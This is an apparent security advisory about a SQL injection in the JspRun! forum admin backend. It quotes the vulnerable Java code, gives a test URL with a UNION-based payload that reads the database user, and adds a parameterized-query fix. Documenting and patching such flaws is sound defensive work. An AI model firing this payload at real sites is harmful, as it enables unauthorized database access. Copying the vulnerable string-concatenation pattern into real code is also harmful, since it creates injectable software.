JspRun! forum management backend injection vulnerability - vulnerability warning - the Black Bar Safety Net

ID MYHACK58:62201130252
Type myhack58
Reporter Anonymous
Modified 2011-04-29T00:00:00


Vulnerability description: the JspRun! forum management backend does not filter the export variable and concatenates it directly into a query statement. From the backend it is therefore possible to operate on the database and gain system privileges.

Vulnerability analysis: when handling backend submissions, ForumManageAction.java at line 1940 does the following:

    String export = request.getParameter("export"); // read directly from the request, no security filtering
    if (export != null) {
        // the raw value is concatenated into the SQL text and the statement is executed as-is
        List<Map<String, String>> styles = dataBaseService.executeQuery(
            "SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright "
            + "FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid "
            + "WHERE styleid='" + export + "'");
        ...
        if (styles == null || styles.size() == 0) {

Vulnerability test:

http://www.cnc.net/admincp.jsp?action=styles&export=1' and 1=2 union select 1,2,3,4,user()-- and "='
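Remediation, as an added example that is not JspRun!'s own code: the same SELECT rewritten so the export value is bound as a parameter rather than spliced into the query text. It assumes a plain JDBC Connection (the page does not show the dataBaseService API) and that styleid is an integer key, as the test URL suggests; the class and method names are hypothetical.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

public class StyleExportQuery {
    // Same SELECT as the vulnerable code, but the lookup value is a bound
    // parameter ("?") instead of being concatenated into the statement text.
    private static final String SQL =
        "SELECT s.name AS name, s.templateid, t.name AS tplname, t.directory, t.copyright "
      + "FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid = s.templateid "
      + "WHERE styleid = ?";

    // Hypothetical replacement for the vulnerable lookup. The Connection argument is an
    // assumption; the page does not show how dataBaseService obtains its connection.
    public static List<Map<String, String>> findStyle(Connection conn, String export)
            throws SQLException {
        List<Map<String, String>> styles = new ArrayList<>();
        if (export == null) {
            return styles;
        }
        // styleid is assumed to be an integer key; anything that is not a plain integer
        // (such as the quote-and-UNION payload from the test URL) is rejected here and
        // never reaches the database.
        int styleId;
        try {
            styleId = Integer.parseInt(export.trim());
        } catch (NumberFormatException e) {
            return styles;
        }
        try (PreparedStatement ps = conn.prepareStatement(SQL)) {
            ps.setInt(1, styleId); // bound parameter: input cannot change the query structure
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    Map<String, String> row = new HashMap<>();
                    row.put("name", rs.getString("name"));
                    row.put("templateid", rs.getString("templateid"));
                    row.put("tplname", rs.getString("tplname"));
                    row.put("directory", rs.getString("directory"));
                    row.put("copyright", rs.getString("copyright"));
                    styles.add(row);
                }
            }
        }
        return styles;
    }
}
```

Even where the key cannot be restricted to an integer, keeping the PreparedStatement binding alone is what closes the injection; the parse step only adds an early, cheap rejection of malformed input.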